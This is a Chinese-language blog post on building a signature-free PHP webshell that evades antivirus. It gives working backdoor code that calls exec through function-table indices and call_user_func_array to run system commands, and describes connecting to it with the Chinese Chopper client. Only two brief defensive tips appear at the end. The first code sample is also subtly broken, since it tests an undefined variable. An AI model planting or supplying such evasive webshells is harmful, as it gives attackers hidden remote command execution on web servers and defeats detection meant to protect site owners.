PHP无特征webshell
- webshell就是将php、asp代码以网页的形式,编写成命令、代码执行的环境,可用于作为网站后门。webshell形式可谓是千变万化,但是总会存在一些文件和代码特征,从而可能被杀毒软件查杀,但是我们如何能做到无文件、无特征,来规避杀毒软件的查杀和检测呢?
常见php代码种可执行命令函数:
eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()、
文件操作函数(file_put_contents()、fputs())、动态函数($a($b))
无特征webshell
原理:这里使用get_defined_functions函数遍历所有函数,然后将特定函数放在call_user_func_array函数中,来执行系统命令。
<?php
function testfunc(){
$func = get_defined_functions(); //遍历所有函数,返回一个二维数组的函数(包括所有已定义的函数,内置的或者用户定义的函数)列表
$args = func_get_args(); //接收传入的参数值
$func_id = array_shift($args); //获取传入的函数所代表的list的key
$func_name = $func['internal'][$func_id]; //根据internal方法来访问系统内置函数,通过key来索引函数名
$tmp = 0;
//print_r($func);
if($conf_name == "exec"){ //判断获取的函数
print_r(call_user_func_array($func_name, $args)); //调用回调函数($func_name),并把一个数组参数(得是索引数组)作为回调函数的参数。
$tmp = 1;
}
return $tmp;
}
for ($x=0; $x<=50000; $x++){
$tmp = testfunc($x, "whoami"); //调用函数
if($tmp == 1){ //退出
break;
}
}
?>
执行结果:
- 通过上面代码原理分析,我们可以看到这里是通过
get_defined_functions遍历函数,从而调用exec等命令执行或代码执行函数的。
编写无特征webshell
注意:
- 这里的797、549、456,就表示通过list key,去索引函数名。
<?php
$arr = get_defined_functions();
print_r($arr);
?>
- 执行结果(当前只是执行系统命令)
<?php
function f(){
$f = get_defined_functions()['internal']; //遍历所有函数,内置函数可以通过$arr['internal']进行访问
$a = func_get_args(); //接收传来的参数
$t = $f[797]($a); //797===>array_shift
$c = $f[$t];
return $f[549]($c, $a); //549===>call_user_func_array
}
print_r(f(456,'whoami')); //456===>exec
?>
使用菜刀进行管理
- 添加变量接收请求
- 执行任意代码
- 菜刀连接
防御方式:
- 1.建议对网站使用WebShell扫描查杀工具进行查杀,例如D盾、WebShellkiller。
- 2.对用户可控网站目录可读可写可执行权限进行严格限制。
11万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
